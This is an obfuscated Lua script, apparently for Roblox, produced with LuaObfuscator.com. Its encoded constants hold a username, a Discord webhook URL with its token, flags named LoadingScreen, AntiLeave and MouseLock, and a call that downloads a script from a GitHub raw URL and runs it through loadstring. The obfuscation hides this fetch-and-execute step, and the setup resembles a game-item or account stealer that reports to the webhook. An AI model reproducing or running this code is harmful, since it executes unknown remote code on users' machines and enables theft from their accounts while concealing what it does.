--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(1 + 0))))%(((882 -(282 + 595)) -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%1) ;else local v84=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1637 -(1523 + 114) ;local v35;local v36;local v37;local v38;while true do if ((0 + 0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;v34=1 -0 ;end if (v34==(1066 -((185 -(32 + 85)) + 997))) then return (v38 * (16778486 -(222 + 4 + 1044))) + (v37 * (285370 -(48750 + 171084))) + (v36 * 256) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=121 -(17 + 104) ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=0) then else v40=0;v41=nil;v39=1 -0 ;end if (v39~=(3 + 0)) then else v46=nil;v47=nil;v39=4;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=3 -1 ;end if (v39==(2 -0)) then v44=nil;v45=nil;v39=1 + 2 ;end if (v39==4) then while true do if (v40==2) then local v96=1636 -(1373 + 263) ;local v97;while true do if (v96~=0) then else v97=1000 -(451 + 549) ;while true do if (v97==0) then local v161=0;while true do if (v161~=1) then else v97=1;break;end if (v161~=(0 + 0)) then else v45=nil;v46=nil;v161=1 -0 ;end end end if (v97~=(1 -0)) then else v40=3;break;end end break;end end end if (v40~=(1385 -(746 + 638))) then else local v98=0 + 0 ;while true do if (v98~=0) then else v43=nil;v44=nil;v98=1 -0 ;end if (v98~=1) then else v40=343 -(218 + 123) ;break;end end end if (v40==(1581 -(1535 + 46))) then local v99=0;while true do if (v99~=1) then else v40=1;break;end if (v99==(0 + 0)) then v41=0 + 0 ;v42=nil;v99=1;end end end if (v40~=3) then else v47=nil;while true do local v100=0;local v101;local v102;while true do if (v100~=(561 -(306 + 254))) then else while true do if (v101==(0 + 0)) then v102=0;while true do if (v102~=(1 -0)) then else if (v41~=(1469 -(899 + 568))) then else local v169=0 + 0 ;local v170;while true do if (v169==(0 -0)) then v170=603 -(268 + 335) ;while true do if (v170==0) then local v176=290 -(60 + 230) ;while true do if (v176==1) then v170=1;break;end if (v176==(572 -(426 + 146))) then for v186=1,v46 do local v187=0 + 0 ;local v188;local v189;local v190;while true do if (v187==1) then v190=nil;while true do if (v188~=(1456 -(282 + 1174))) then else local v195=811 -(569 + 242) ;while true do if (v195==(2 -1)) then v188=1;break;end if (v195~=0) then else local v204=0 + 0 ;while true do if ((1024 -(706 + 318))~=v204) then else v189=v22();v190=nil;v204=1252 -(721 + 530) ;end if (1==v204) then v195=1272 -(945 + 326) ;break;end end end end end if (v188==(2 -1)) then if (v189==1) then v190=v22()~=(0 + 0) ;elseif (v189==(702 -(271 + 429))) then v190=v25();elseif (v189==(3 + 0)) then v190=v26();end v47[v186]=v190;break;end end break;end if (v187==(1500 -(1408 + 92))) then local v192=0;while true do if (v192~=(1086 -(461 + 625))) then else v188=1288 -(993 + 295) ;v189=nil;v192=1 + 0 ;end if (1==v192) then v187=1172 -(418 + 753) ;break;end end end end end v45[2 + 1 ]=v22();v176=1;end end end if (v170~=1) then else for v179=1,v24() do local v180=0;local v181;local v182;local v183;while true do if (v180==(1 + 0)) then v183=nil;while true do if (0~=v181) then else v182=0;v183=nil;v181=1;end if (v181~=(1 + 0)) then else while true do if ((0 + 0)==v182) then v183=v22();if (v21(v183,1,530 -(406 + 123) )~=0) then else local v197=0;local v198;local v199;local v200;local v201;local v202;local v203;while true do if (v197==(1771 -(1749 + 20))) then v202=nil;v203=nil;v197=1 + 2 ;end if (v197==3) then while true do if (v198~=(1323 -(1249 + 73))) then else local v205=0 + 0 ;while true do if (v205~=1) then else v198=1147 -(466 + 679) ;break;end if (v205==(0 -0)) then v201=nil;v202=nil;v205=2 -1 ;end end end if (v198~=(1900 -(106 + 1794))) then else local v206=0 + 0 ;while true do if (v206==(1 + 0)) then v198=2 -1 ;break;end if (v206==0) then v199=0 -0 ;v200=nil;v206=115 -(4 + 110) ;end end end if (v198~=2) then else v203=nil;while true do if (v199==1) then local v207=584 -(57 + 527) ;while true do if (v207~=(1427 -(41 + 1386))) then else v202=nil;v203=nil;v207=104 -(17 + 86) ;end if (v207==1) then v199=2;break;end end end if ((0 + 0)~=v199) then else local v208=0;while true do if (v208==(1 -0)) then v199=2 -1 ;break;end if (v208==0) then local v209=0;while true do if (v209==0) then v200=166 -(122 + 44) ;v201=nil;v209=1;end if (v209==1) then v208=1;break;end end end end end if (v199~=2) then else while true do if (v200~=(0 -0)) then else local v210=0;local v211;while true do if (v210~=(0 -0)) then else v211=0;while true do if (v211~=(1 + 0)) then else v200=1 + 0 ;break;end if (v211~=(0 -0)) then else v201=v21(v183,67 -(30 + 35) ,3 + 0 );v202=v21(v183,4,1263 -(1043 + 214) );v211=3 -2 ;end end break;end end end if (v200==3) then if (v21(v202,1215 -(323 + 889) ,3)==(2 -1)) then v203[584 -(361 + 219) ]=v47[v203[324 -(53 + 267) ]];end v42[v179]=v203;break;end if (v200==2) then local v213=0 + 0 ;while true do if (v213==1) then v200=3;break;end if (v213~=(413 -(15 + 398))) then else if (v21(v202,983 -(18 + 964) ,3 -2 )~=1) then else v203[2]=v47[v203[2 + 0 ]];end if (v21(v202,2,2)==1) then v203[3]=v47[v203[2 + 1 ]];end v213=1;end end end if (v200~=(851 -(20 + 830))) then else local v214=0;local v215;local v216;while true do if (v214~=0) then else v215=0 + 0 ;v216=nil;v214=1;end if (v214~=1) then else while true do if (v215~=0) then else v216=0;while true do if (v216==1) then v200=2;break;end if (v216~=0) then else local v223=0;while true do if (v223==(127 -(116 + 10))) then v216=1;break;end if (v223~=(0 + 0)) then else v203={v23(),v23(),nil,nil};if (v201==0) then local v224=0 + 0 ;local v225;local v226;while true do if (v224==1) then while true do if (v225~=0) then else v226=0;while true do if (v226~=0) then else v203[2 + 1 ]=v23();v203[2 + 2 ]=v23();break;end end break;end end break;end if (v224~=(0 -0)) then else v225=0;v226=nil;v224=2 -1 ;end end elseif (v201==(1552 -(1126 + 425))) then v203[408 -(118 + 287) ]=v24();elseif (v201==2) then v203[3]=v24() -(2^16) ;elseif (v201==(11 -8)) then local v229=1121 -(118 + 1003) ;local v230;while true do if (v229~=0) then else v230=0;while true do if (v230==0) then v203[8 -5 ]=v24() -(2^16) ;v203[4]=v23();break;end end break;end end end v223=378 -(142 + 235) ;end end end end break;end end break;end end end end break;end end break;end end break;end if (1==v197) then v200=nil;v201=nil;v197=9 -7 ;end if (v197==(0 + 0)) then v198=977 -(553 + 424) ;v199=nil;v197=1;end end end break;end end break;end end break;end if (v180==(0 -0)) then v181=0;v182=nil;v180=1 + 0 ;end end end v41=3 + 0 ;break;end end break;end end end if (v41==3) then local v171=0;while true do if (v171==(0 + 0)) then local v172=0;local v173;while true do if (v172~=(0 + 0)) then else v173=0 + 0 ;while true do if (v173==(0 -0)) then local v185=0;while true do if (v185~=(0 -0)) then else for v193=1,v24() do v43[v193-(2 -1) ]=v29();end return v45;end end end end break;end end end end end break;end if (v102~=(0 + 0)) then else local v168=0;while true do if (v168~=(0 -0)) then else if (v41==(753 -(239 + 514))) then local v174=0 + 0 ;while true do if (v174~=0) then else local v177=0;local v178;while true do if (v177==(1329 -(797 + 532))) then v178=0;while true do if (v178==(1 + 0)) then v174=1 + 0 ;break;end if ((0 -0)==v178) then local v191=1202 -(373 + 829) ;while true do if (v191~=(732 -(476 + 255))) then else v178=1131 -(369 + 761) ;break;end if (v191~=(0 + 0)) then else v42={};v43={};v191=1;end end end end break;end end end if (v174~=(1 -0)) then else v44={};v41=1;break;end end end if ((1 -0)~=v41) then else local v175=0;while true do if (v175~=0) then else v45={v42,v43,nil,v44};v46=v24();v175=337 -(144 + 192) ;end if (1~=v175) then else v47={};v41=218 -(42 + 174) ;break;end end end v168=1;end if ((1 + 0)~=v168) then else v102=1;break;end end end end break;end end break;end if (v100~=0) then else v101=0;v102=nil;v100=1;end end end break;end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1 + 0 ;local v51=(v21(v49,1,9 + 11 ) * ((1506 -((1093 -730) + 1141))^32)) + v48 ;local v52=v21(v49,1601 -(1183 + (701 -(244 + 60))) ,94 -63 );local v53=((v21(v49,24 + (1009 -(938 + 63)) )==(1 + 0)) and  -(1976 -(1472 + 441 + 62))) or 1 ;if (v52==0) then if (v51==(0 + 0)) then return v53 * ((1125 -(936 + 189)) -0) ;else v52=1934 -(565 + 1368) ;v50=0 -0 ;end elseif (v52==(3708 -(1477 + 184))) then return ((v51==(0 -0)) and (v53 * ((1 + 0 + 0)/0))) or (v53 * NaN) ;end return v8(v53,v52-1023 ) * (v50 + (v51/((858 -(564 + 292))^((1702 -(1565 + 48)) -37)))) ;end v26=nil;function v26(v54)local v55=0 + 0 ;local v56;local v57;while true do if (v55==3) then return v6(v57);end if ((1 + 0)==v55) then v56=v3(v16,v19,(v19 + v54) -(3 -2) );v19=v19 + v54 ;v55=6 -4 ;end if ((1140 -(782 + 356))==v55) then v57={};for v89=268 -((471 -295) + 91) , #v56 do v57[v89]=v2(v1(v3(v56,v89,v89)));end v55=5 -2 ;end if (v55==((1227 -(322 + 905)) -0)) then v56=nil;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=1093 -(975 + 117) ;end end end v18=5;end if (v18==2) then function v22()local v58=611 -((1902 -1300) + 9) ;local v59;while true do if (v58==0) then v59=v1(v16,v19,v19);v19=v19 + (1190 -(449 + 740)) ;v58=873 -(826 + 46) ;end if (v58==(948 -(79 + 166 + 702))) then return v59;end end end v23=nil;function v23()local v60,v61=v1(v16,v19,v19 + (1900 -(260 + 1638)) );v19=v19 + (442 -(382 + 58)) ;return (v61 * (821 -565)) + v60 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v85=v2(v0(v62,16));if v20 then local v91=v5(v85,v20);v20=nil;return v91;else return v85;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]]=v81[3]~=0 ;elseif (v82==1) then local v112=v81[2];local v113,v114=v72(v79[v112](v13(v79,v112 + 1 ,v81[3])));v74=(v114 + v112) -1 ;local v115=0;for v135=v112,v74 do v115=v115 + 1 ;v79[v135]=v113[v115];end else do return;end end elseif (v82<=3) then local v104=0;local v105;local v106;local v107;local v108;local v109;while true do if (v104==4) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v104=5;end if (v104==7) then v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end break;end if (v104==3) then v79[v109 + 1 ]=v108;v79[v109]=v108[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v104=4;end if (v104==2) then v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v109=v81[2];v108=v79[v81[3]];v104=3;end if (v104==5) then v109=v81[2];v106,v107=v72(v79[v109](v13(v79,v109 + 1 ,v81[3])));v74=(v107 + v109) -1 ;v105=0;for v162=v109,v74 do local v163=0;while true do if (v163==0) then v105=v105 + 1 ;v79[v162]=v106[v105];break;end end end v104=6;end if (v104==6) then v73=v73 + 1 ;v81=v69[v73];v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));v73=v73 + 1 ;v104=7;end if (v104==0) then v105=nil;v106,v107=nil;v108=nil;v109=nil;v79[v81[2]][v81[3]]=v81[4];v104=1;end if (v104==1) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v104=2;end end elseif (v82>4) then v65[v81[3]]=v79[v81[2]];else v79[v81[2]]=v65[v81[3]];end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]();elseif (v82>7) then local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82<=9) then v79[v81[2]][v81[3]]=v81[4];elseif (v82>10) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];else local v133=0;local v134;while true do if (v133==0) then v134=v81[2];v79[v134]=v79[v134](v13(v79,v134 + 1 ,v74));break;end end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030F3O00626573746368616E6365313233313203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31333O3533322O313234383432373133382F6A36475A44764A34546D355279654B4657444C746A5071686E51435352486D304D4131506637516535655574664E4F707A6978494A2O6C55336B5863443352337A4F536B03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00120B3O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012043O00063O0030033O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
